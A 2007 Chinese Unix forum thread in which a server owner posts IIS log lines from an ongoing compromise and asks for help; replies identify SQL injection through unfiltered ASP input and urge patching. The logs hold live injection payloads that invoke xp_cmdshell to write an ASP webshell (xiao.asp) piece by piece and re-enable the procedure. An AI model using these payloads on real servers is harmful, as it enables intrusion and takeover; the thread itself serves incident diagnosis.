免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 3151 | 回复: 3
打印 上一主题 下一主题

我的服务器一直被黑,请求大侠帮忙,下面是IIS里面的一段log [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2007-05-09 10:08 |只看该作者 |倒序浏览
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20dim%20objFSO%20%25^>%20>f:\xxx\xiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能,请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20dim%20fdata%20%25^>%20>>f:\xxxxiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能,请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20dim%20objCountFile%20%25^>%20>>f:\xxx\xiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能,请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20on%20error%20resume%20next%20%25^>%20>>f:\xxx\xiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能,请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20Set%20objFSO%20=%20Server.CreateObject(^"Scripting.FileSystemObject^")%20%25^>%20>>f:\xxx\xiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能,请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64


请大家帮我看一下,问题出在哪里 谢谢了!!!!

论坛徽章:
1
技术图书徽章
日期:2013-12-05 23:25:45
2 [报告]
发表于 2007-05-09 10:22 |只看该作者
显而易见,是你的asp程序没有对输入的变量进行过滤或者安全处理,就直接入库查询导致的。

你需要修改一下你的asp程序。

论坛徽章:
0
3 [报告]
发表于 2007-09-07 10:43 |只看该作者
被注入了。

论坛徽章:
0
4 [报告]
发表于 2007-09-07 15:56 |只看该作者
赶快把该补的地方好好修补一下
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP